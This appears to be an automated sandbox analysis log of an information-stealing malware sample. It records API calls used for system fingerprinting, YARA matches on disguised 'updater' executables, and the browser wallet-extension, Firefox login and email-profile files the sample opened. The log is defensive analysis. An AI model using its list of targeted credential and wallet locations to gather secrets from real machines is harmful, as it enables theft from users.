Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F44C30 GetVersionExA,GetFileAttributesW,GetFileAttributesA, 3_2_02F44C30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2335364772.00000000077EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\9VicU2EcsIoeWuNiSqblWRg.zip, type: DROPPED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match File source: 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2335364772.00000000077EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\9VicU2EcsIoeWuNiSqblWRg.zip, type: DROPPED